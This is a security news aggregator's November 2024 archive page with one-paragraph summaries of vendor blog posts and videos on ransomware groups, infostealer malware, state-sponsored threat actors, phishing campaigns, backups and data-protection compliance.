Security | Threat Detection | Cyberattacks | DevSecOps | Compliance

November 2024

Embracing Conscious Leadership and Generative AI Transformation with Aysha Khan of Treasure Data

Nov 29, 2024 By Rubrik In Rubrik
Welcome to the Data Security Decoded podcast, brought to you by Rubrik Zero Labs. In each episode, we discuss cybersecurity with thought leaders and industry experts, and get their take on trends, themes, and how they see data security evolving. This is a must-listen for security and IT leaders looking to better understand trends shaping data security and how they can achieve cyber resilience.
View Video
jfrog

Everything you need to know about EvilProxy Attacks

Nov 26, 2024 By Orel Bitan In JFrog
An “Evil Proxy” is a malicious proxy server used by attackers to intercept and change the communication between a client and a legitimate server. It is also known as Phishing-as-a-Service (PhaaS), where the attackers attempt to deceive individuals into providing sensitive information such as usernames, passwords, and credit card numbers.
Read Post
foresiet

Understanding TellYouThePass Ransomware: A Growing Threat in 2024

Nov 25, 2024 By Foresiet In Foresiet
TellYouThePass ransomware, first seen in 2019, is once again in the spotlight due to its recent activity. This ransomware has been found exploiting critical vulnerabilities in PHP, specifically the CVE-2024-4577 flaw, putting both Windows and Linux systems at risk. The malware uses advanced techniques like web shells and fileless malware to gain entry, highlighting the need for robust cybersecurity measures.
Read Post
11:11 systems

Stay ahead of cybercrime and ransomware with Zerto 10's encryption detection

Nov 25, 2024 By Justin Nordeste In 11:11 Systems
In the time it takes you to finish this post — perhaps even this sentence — it is more than likely that ransomware will disrupt yet another business, causing extensive delays and irrevocable damage. Across the globe, ransomware attacks continue to increase in frequency, sophistication, and consequence, littering headlines with cautionary tales and sobering statistics. Over the next decade, Cybersecurity Ventures predicts that global ransomware damage will grow by 30 percent annually.
Read Post
securitysenses

Cybersecurity in Gaming: protecting players and virtual assets from growing threats

Nov 25, 2024 By SecuritySenses In SecuritySenses
Cybersecurity is becoming a critical necessity in today's world, where technology is used in virtually every aspect of life. Every year, the number of cyberattacks grows, and the methods of attackers are becoming more sophisticated. Protecting personal data, financial information and corporate secrets requires reliable technologies and increased attention from users. The gaming industry is also an important area that needs protection.
Read Post
securitysenses

Artificial Intelligence in Cybersecurity: Threat or Advantage?

Nov 25, 2024 By SecuritySenses In SecuritySenses
In today's hyperconnected world, cybersecurity stands as the first line of defense against the growing tide of cyber threats. With billions of devices connected globally, protecting sensitive information has never been more critical-or complex. Enter artificial intelligence (AI), a technological marvel capable of revolutionizing cybersecurity. But as with all powerful tools, AI is a double-edged sword. It holds incredible potential to bolster defenses yet can also amplify the capabilities of cybercriminals.
Read Post

Why Healthcare Must Urgently Enhance Data Security

Nov 21, 2024 By Rubrik In Rubrik
In this episode of CISO Conversations: EU Data Regulations, Nicolas Groh, Field CTO at Rubrik, is joined by Anastasiya Kiseleva, a PhD Researcher in Law, Health, and Technologist at the Vrije Universiteit Brussel, John Noble, Former Non-Executive Director at NHS England, and Dr. Stefan Buttigieg, Resident Specialist in Public Health Medicine at the Ministry for Health and Active Aging in Malta.
View Video

How Are People Targeted With Malware

Nov 21, 2024 By Keeper In Keeper
Malicious software, also known as malware, is a program that is designed to harm computer systems and devices. Cybercriminals target individuals with malware by creating spoofed websites, sending fake emails or messages, executing drive-by download attacks or deceiving users to download programs from a fake source. Learn more about how malware is delivered and how to prevent malware attacks.
View Video
splunk

Cracking Braodo Stealer: Analyzing Python Malware and Its Obfuscated Loader

Nov 21, 2024 By Splunk Threat Research Team In Splunk
Braodo Stealer is one of the many active and evolving malware families designed to steal sensitive information, such as credentials, cookies, and system data, from compromised machines. Typically written in Python, this malware employs a variety of obfuscation techniques to conceal its true intentions, making it challenging for security solutions to identify.
Read Post
cyjax

ContFRaversy in Ransomland: Tor-based site emerges for new French-speaking RaaS operation "ContFR"

Nov 21, 2024 By Adam Price In CYJAX
Following the emergence of data-leak sites (DLSs) for extortion groups Kairos, Chort, and Termite, Cyjax has observed the emergence of a Tor-based site belonging to a new French-speaking Ransomware-as-a-Service (RaaS) operation called ’ContFR’. ContFR is potentially referencing well-known ransomware group Conti, whilst incorporating a reference to France.
Read Post
knowbe4

Ransomware Gangs Evolve: They're Now Recruiting Penetration Testers

Nov 20, 2024 By Stu Sjouwerman In KnowBe4
A new and concerning cybersecurity trend has emerged. According to the latest Q3 2024 Cato CTRL SASE Threat Report from Cato Networks, ransomware gangs are now actively recruiting penetration testers to enhance the effectiveness of their attacks. This development signals a significant shift in the tactics employed by cybercriminals and underscores the need for organizations to remain vigilant in their defense strategies.
Read Post
netskope

Python NodeStealer Targets Facebook Ads Manager with New Techniques

Nov 20, 2024 By Jan Michael Alcantara In Netskope
In September 2024, Netskope Threat Labs reported a Python-based NodeStealer targeting Facebook business accounts. NodeStealer collects Facebook and other credentials stored in the browser and its cookie data. For over a year, we have tracked and discovered multiple variants of this infostealer. It is now targeting new victims and extracting new information using new techniques. In this blog post, we will dissect the development of the Python NodeStealer from multiple samples in the wild.
Read Post
CrowdStrike

Unveiling LIMINAL PANDA: A Closer Look at China's Cyber Threats to the Telecom Sector

Nov 19, 2024 By Counter Adversary Operations In CrowdStrike
On Tuesday, November 19, 2024, Adam Meyers, CrowdStrike Senior Vice President of Counter Adversary Operations, will testify in front of the U.S. Senate Judiciary Subcommittee on Privacy, Technology, and the Law on Chinese cyber threats to critical infrastructure. Within his testimony, Adam will speak publicly for the first time about a China-nexus state-sponsored actor that CrowdStrike Counter Adversary Operations tracks as LIMINAL PANDA.
Read Post

DSPM vs DLP: Unraveling the Differences

Nov 19, 2024 By Rubrik In Rubrik
In this episode of Into the Breach, James Purvis and Drew Russell discuss the key differences between Data Loss Prevention (DLP) and Data Security Posture Management (DSPM). Drew explains that while DLP focuses on perimeter security, DSPM secures data at rest, offering a more proactive approach. Using a clever analogy, Drew illustrates how DSPM prevents issues before they occur, unlike DLP's reactive measures. They conclude by highlighting how both can work together to enhance data security.
View Video
obrela

Understanding Polymorphic Viruses and Polymorphic Malware

Nov 19, 2024 By Obrela In Obrela
Polymorphic viruses and polymorphic malware represent some of the most sophisticated challenges in modern business. These types of malware are designed to evade traditional cyber security measures by constantly changing their appearance making them particularly difficult to detect and eliminate.
Read Post
cyberint

Akira Ransomware: Published Over 30 New Victims on their DLS

Nov 18, 2024 By Adi Bleih In Cyberint
The Akira ransomware group has been active since March 2023, targeting diverse industries across North America, the UK, and Australia. Operating as a Ransomware-as-a-Service (RaaS) model, Akira employs a double-extortion strategy by stealing sensitive data before encrypting it. According to their leak site, the group claims to have compromised over 350 organizations.
Read Post
kroll

CARBANAK (aka ANUNAK) Distributed via IDATLOADER (aka HIJACKLOADER)

Nov 18, 2024 By Kroll In Kroll
IDATLOADER (aka HIJACKLOADER, GHOSTPULSE) has become prevalent in 2024, using advanced and new techniques such as BPL Sideloading, which Kroll reported on in June. Kroll observes IDATLOADER distributing malware such as ASYNCRAT, PURESTEALER, REMCOS, STEALC and what some might describe as a recent epidemic in LUMMASTEALER infections.
Read Post
knowbe4

Half of all Ransomware Attacks This Year Targeted Small Businesses

Nov 15, 2024 By Stu Sjouwerman In KnowBe4
New data shows just how crippling ransomware has been on small businesses that have fallen victim to an attack and needed to pay the ransom. Logic would normally dictate that ransomware gangs are going to go after the “big fishes” – the larger organizations with deep pockets. But with the advent of the “as a service” model of ransomware, threat actors have found a niche, with many of them focusing on businesses with 1 to 50 employees.
Read Post
foresiet

ElizaRAT and Beyond: The Evolution of APT36's Malware Arsenal

Nov 14, 2024 By Foresiet In Foresiet
APT36, also known as Transparent Tribe, is a well-known cyber espionage group attributed to Pakistan. Active since 2013, this advanced persistent threat (APT) group has focused its efforts primarily on Indian government sectors, including defense, education, and key infrastructure. APT36 has demonstrated consistent sophistication in their tactics, evolving their methods to target a wide array of platforms and systems.
Read Post

AI Governance and Global Cyber Resilience

Nov 14, 2024 By Rubrik In Rubrik
In this episode of CISO Conversations: EU Data Regulations, Richard Cassidy, EMEA Field CISO at Rubrik, is joined by Anu Bradford, Professor of Law at Columbia Law School, and Bronwyn Boyle, Chief Information Security Officer at PPRO. They discuss the importance of resilience and regulatory compliance as critical factors for organizations to manage their cyber threats and bolster cyber defense.
View Video
knowbe4

Criminal Threat Actor Uses Stolen Invoices to Distribute Malware

Nov 13, 2024 By Stu Sjouwerman In KnowBe4
Researchers at IBM X-Force are tracking a phishing campaign by the criminal threat actor “Hive0145” that’s using stolen invoice notifications to trick users into installing malware. Hive0145 acts as an initial access broker, selling access to compromised organizations to other threat actors who then carry out additional cyberattacks.
Read Post
WatchGuard

Evasive malware has grown by 168% causing direct impact on cybersecurity

Nov 13, 2024 By The Editor In WatchGuard
With a 168% rise in evasive malware, cyber threats have reached a new level of sophistication. This type of malware employs advanced techniques to evade detection by traditional solutions, which often rely on pre-defined signatures to identify threats. These malicious programs pose a major challenge in cybersecurity by camouflaging themselves within legitimate processes and acting stealthily.
Read Post
knowbe4

Nation-State Threat Actors Rely on Social Engineering First

Nov 12, 2024 By Stu Sjouwerman In KnowBe4
A new report from ESET has found that most nation-state threat actors rely on spear phishing as a primary initial access technique. In the second and third quarters of 2024, state-sponsored APTs from China, Russia, Iran, and North Korea used social engineering attacks to compromise their targets. Iranian threat actors continued conducting cyber espionage against countries across the Middle East, Europe, and the US. They also expanded their targeting to hit financial companies in Africa.
Read Post

The 3-2-1-1 Strategy: Protecting Your Backups Against Ransomware with NAKIVO

Nov 12, 2024 By NAKIVO In NAKIVO
Following the 3-2-1-1 backup rule can ensure your Microsoft 365 data is protected and readily recoverable in any scenario, whether accidental data deletion or even ransomware encryption. Watch this short video to see how you can easily create multiple backup copies of Microsoft 365 data to comply with the 3-2-1-1 backup rule using NAKIVO Backup & Replication.
View Video
kroll

LUMMASTEALER Delivered Via PowerShell Social Engineering

Nov 12, 2024 By Kroll In Kroll
The Kroll Security Operations Center (SOC) has recently detected and remediated a trend of incidents that involved socially engineering a victim into pasting a PowerShell script into the “Run” command window to begin a compromise. These incidents have typically begun with the victim user attempting to find “YouTube to mp3” converters, or similar, then being redirected to the malicious webpages.
Read Post
nakivo

Enabling Backup Encryption with NAKIVO: A Comprehensive Guide

Nov 11, 2024 By NAKIVO Team In NAKIVO
Encryption is widely used for security purposes because it prevents unauthorized third parties from accessing and disseminating private data. Backups are no exception and are often a target of data breaches. As part of a data protection strategy, you can implement encryption as an additional layer of security for your backups.
Read Post

Detect and Protect Strategies for Malware Free Websites and APIs

Nov 8, 2024 By Indusface In Indusface
Over 1 billion known malware threats exist, with an alarming 17 million new variants emerging each month! Malware targeting customer-facing websites and API applications poses significant risks, including compliance violations, defacements, and even blacklisting. In this webinar, join Vivekanand Gopalan, VP of Products at Indusface, as he shares effective strategies for safeguarding websites and APIs against malware.
View Video
securitysenses

Is Your Social Media Growth Safe? Navigating Security Risks of Buying Followers and Likes

Nov 8, 2024 By SecuritySenses In SecuritySenses
In today's hyper-connected world, social media platforms like Instagram and TikTok have become essential tools for personal branding, business marketing, and even social influence. With the rising importance of social media metrics such as follower counts and likes, there's been a surge in individuals and brands purchasing followers and likes to boost their online image. However, this seemingly quick way to boost social media presence comes with notable risks. When buying followers, ensuring social media security is crucial, as these practices can open doors to security vulnerabilities, account bans, and even reputational damage.
Read Post
Trustwave

Analyzing Play and LockBit: The Top Ransomware Threats Facing Retailers

Nov 7, 2024 By Trustwave In Trustwave
This blog is the latest in a series that delves into the deep research conducted daily by the Trustwave SpiderLabs team on major threat actor groups currently operating globally. Retailer databases are chock-full of information that makes them highly attractive targets for ransomware gangs, as highlighted by Trustwave SpiderLabs in its recent 2024 Trustwave Risk Radar Report: Retail Sector.
Read Post

Going Rogue: APT49 Using Rogue RDP | Threat SnapShot

Nov 6, 2024 By SnapAttack In SnapAttack
In 2022, Microsoft began blocking macros originating from the internet in Office, pushing both pentesters and threat actors to explore new methods for initial access. Fast forward to October 2024, and APT29 is leveraging one of those methods—Rogue RDP—discovered as a workaround back in 2022. In this video, we dive into a recent spearphishing campaign uncovered by the Ukrainian CERT, where attackers used Rogue RDP to gain initial access to targets. This video will provide you practical detection opportunities that can be used to hunt for this activity in your environment.
View Video
keeper

Can Viruses Come From a PDF?

Nov 5, 2024 By Ashley D'Andrea In Keeper
Yes, viruses can come from a PDF by hiding in malicious code. A virus is a type of malware, which is malicious software intended to infect your device and steal private data. A virus can infect your device only if you interact with it, which could happen by opening a PDF containing a virus. Since PDFs are so widely used, hackers can hide viruses within innocent-looking files to jeopardize your privacy.
Read Post
knowbe4

BlackBasta Ransomware Gang Uses New Social Engineering Tactics To Target Corporate Networks

Nov 5, 2024 By Stu Sjouwerman In KnowBe4
ReliaQuest warns that the BlackBasta ransomware gang is using new social engineering tactics to obtain initial access within corporate networks. The threat actor begins by sending mass email spam campaigns targeting employees, then adding people who fall for the emails to Microsoft Teams chats with external users. These external users pose as IT support or help desk staff, and send employees Microsoft Teams messages containing malicious QR codes.
Read Post
safeaeon

How to Prevent Ransomware on Networks: Proven Strategies for Protection

Nov 4, 2024 By SafeAeon Inc. In SafeAeon
Organizations around the world are increasingly vulnerable to ransomware attacks, expected to cause over $20 billion in damages by the end of 2024. These cyber attacks are capable of shutting down entire networks, disrupting services, and inflicting severe financial and reputational damage. Knowing how to prevent ransomware on networks is essential in safeguarding against these dangers.
Read Post

Why Compliance Costs Less Than Non-Compliance #cisoconversations #eudataregulations #nis2 #shorts

Nov 1, 2024 By Rubrik In Rubrik
NIS2 non-compliance carries hefty penalties. The stakes are high. Fines can be at least 10 million euros or 2% of worldwide annual turnover. But here's the thing: the cost of compliance is generally much lower than these penalties. More on the topic you can learn in the latest episode of CISO Conversations: EU Data Regulations with Madeline Bennett and Richard Cassidy.
View Video

Copyright © 2024 OpsMatters™. All rights reserved.